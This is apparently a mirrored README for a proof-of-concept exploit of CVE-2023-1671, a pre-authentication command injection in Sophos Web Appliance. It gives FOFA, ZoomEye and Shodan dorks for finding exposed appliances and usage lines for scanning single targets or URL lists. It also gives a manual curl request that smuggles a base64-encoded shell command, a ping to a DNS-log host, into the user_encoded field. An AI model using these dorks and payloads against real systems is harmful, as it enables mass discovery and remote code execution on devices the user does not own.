关联漏洞
Description
CVE-2023-1671-POC, based on dnslog platform
介绍
# Dork
## fofa
`(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance:错误请求"`
## ZoomEye
`title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"`
## Shodan
`title:"Sophos Web Appliance"`
# Usage
```shell
python CVE-2023-1671-POC.py -u http://www.example.com
python CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cn
python CVE-2023-1671-POC.py -f urls.txt
python CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cn
```
or without this script file:
```shell
echo -n "';ping xxxxx.dnslog.cn -c 3 #" | base64
# JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM= --> JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM
curl -k --trace-ascii % "http://www.example.com/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=12345&filetype=12345&user=12345&user_encoded=JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM"
```
# Reference
[Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog - VulnCheck](https://vulncheck.com/blog/cve-2023-1671-analysis)
文件快照
[4.0K] /data/pocs/1306fff120170dbec79590c862592fb49fc1994c
├── [3.2K] CVE-2023-1671-POC.py
└── [1.1K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。